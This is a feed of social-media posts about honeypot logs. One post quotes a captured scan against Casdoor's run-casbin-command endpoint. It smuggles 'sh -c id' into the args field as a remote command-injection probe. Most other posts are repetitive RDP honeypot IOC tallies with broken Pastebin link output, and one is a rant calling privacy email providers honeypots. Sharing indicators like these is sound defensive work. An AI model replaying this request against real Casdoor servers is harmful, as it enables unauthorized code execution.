There seems to be a remote code execution issue in Casdoor? My honeypots are seeing these scans:

GET /api/run-casbin-command?language=exec&args=["enforce","-m","[request_definition]\nr = sub, obj, act\n\n[policy_definition]\np = sub, obj, act\n\n[role_definition]\ng = _, _\n\n[policy_effect]\ne = some(where (p.eft == allow))\n\n[matchers]\nm = r.sub == p.sub","-p","p, x, x, x","sh","-c","id"]&t=2026-03-30T16:12:50Z&m=1191e3dce3682e9382680387ffe783bb87cd213a48f4f1fa6c10644d039f4dc6 HTTP/1.1
Host: x.x.x.x:8000
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15

#casdoor #honeypot #infosec #dfir #cybersecurity

2026-03-30 RDP #Honeypot IOCs - 681 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 495
80.66.83.74 - 27
80.94.95.221 - 21

Top ASNs:
AS14061 - 495
AS396982 - 45
AS204428 - 45

Top Accounts:
hello - 510
Administr - 54
Domain - 45

Top ISPs:
DigitalOcean, LLC - 495
Google LLC - 45
SS-Net - 45

Top Clients:
Unknown - 681

Top Software:
Unknown - 681

Top Keyboards:
Unknown - 681

Top IP Classification:
hosting & proxy - 495
Unknown - 117
hosting - 51

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-30 RDP #Honeypot IOCs - 454 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 330
80.66.83.74 - 18
80.94.95.221 - 14

Top ASNs:
AS14061 - 330
AS396982 - 30
AS204428 - 30

Top Accounts:
hello - 340
Administr - 36
Domain - 30

Top ISPs:
DigitalOcean, LLC - 330
Google LLC - 30
SS-Net - 30

Top Clients:
Unknown - 454

Top Software:
Unknown - 454

Top Keyboards:
Unknown - 454

Top IP Classification:
hosting & proxy - 330
Unknown - 78
hosting - 34

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-30 RDP #Honeypot IOCs - 227 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 165
80.66.83.74 - 9
80.94.95.221 - 7

Top ASNs:
AS14061 - 165
AS396982 - 15
AS204428 - 15

Top Accounts:
hello - 170
Administr - 18
Domain - 15

Top ISPs:
DigitalOcean, LLC - 165
Google LLC - 15
SS-Net - 15

Top Clients:
Unknown - 227

Top Software:
Unknown - 227

Top Keyboards:
Unknown - 227

Top IP Classification:
hosting & proxy - 165
Unknown - 39
hosting - 17

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-29 RDP #Honeypot IOCs - 597 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 459
80.94.95.221 - 21
80.94.95.83 - 12

Top ASNs:
AS14061 - 462
AS204428 - 42
AS396982 - 36

Top Accounts:
hello - 474
Administr - 48
Test - 18

Top ISPs:
DigitalOcean, LLC - 462
SS-Net - 42
Google LLC - 36

Top Clients:
Unknown - 597

Top Software:
Unknown - 597

Top Keyboards:
Unknown - 597

Top IP Classification:
hosting & proxy - 462
Unknown - 75
hosting - 60

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-29 RDP #Honeypot IOCs - 398 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 306
80.94.95.221 - 14
80.94.95.83 - 8

Top ASNs:
AS14061 - 308
AS204428 - 28
AS396982 - 24

Top Accounts:
hello - 316
Administr - 32
Test - 12

Top ISPs:
DigitalOcean, LLC - 308
SS-Net - 28
Google LLC - 24

Top Clients:
Unknown - 398

Top Software:
Unknown - 398

Top Keyboards:
Unknown - 398

Top IP Classification:
hosting & proxy - 308
Unknown - 50
hosting - 40

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-29 RDP #Honeypot IOCs - 199 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 153
80.94.95.221 - 7
80.94.95.83 - 4

Top ASNs:
AS14061 - 154
AS204428 - 14
AS396982 - 12

Top Accounts:
hello - 158
Administr - 16
Test - 6

Top ISPs:
DigitalOcean, LLC - 154
SS-Net - 14
Google LLC - 12

Top Clients:
Unknown - 199

Top Software:
Unknown - 199

Top Keyboards:
Unknown - 199

Top IP Classification:
hosting & proxy - 154
Unknown - 25
hosting - 20

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

Lol I can't anymore, #Protonmail gave Data to the #Swiss Government, and they gave this Data to the #FBI. Over the #payment Details Proton made a person identifiable.

Also #Proton tracks IP Adresses; So basically it means when you pay via any "Identifiable" Form, use your "own IP Address" or use a Recover Phone/E-Mail, Proton will identify you if they get asked for it. I said it before, and I'll say it again. Services like Proton, #tutanota and #posteo are freaking Honeypots!

via Heise & c't
https://youtu.be/I_PgvZpMga8

#protonhoneypot #proton #honeypot

2026-03-28 RDP #Honeypot IOCs - 765 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 495
38.76.31.20 - 108
80.94.95.221 - 48

Top ASNs:
AS14061 - 510
AS174 - 108
AS204428 - 63

Top Accounts:
hello - 606
Administr - 87
Test - 12

Top ISPs:
DigitalOcean, LLC - 510
Cogent Communications - 108
SS-Net - 63

Top Clients:
Unknown - 765

Top Software:
Unknown - 765

Top Keyboards:
Unknown - 765

Top IP Classification:
hosting & proxy - 510
Unknown - 216
hosting - 39

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-28 RDP #Honeypot IOCs - 510 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 330
38.76.31.20 - 72
80.94.95.221 - 32

Top ASNs:
AS14061 - 340
AS174 - 72
AS204428 - 42

Top Accounts:
hello - 404
Administr - 58
Test - 8

Top ISPs:
DigitalOcean, LLC - 340
Cogent Communications - 72
SS-Net - 42

Top Clients:
Unknown - 510

Top Software:
Unknown - 510

Top Keyboards:
Unknown - 510

Top IP Classification:
hosting & proxy - 340
Unknown - 144
hosting - 26

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security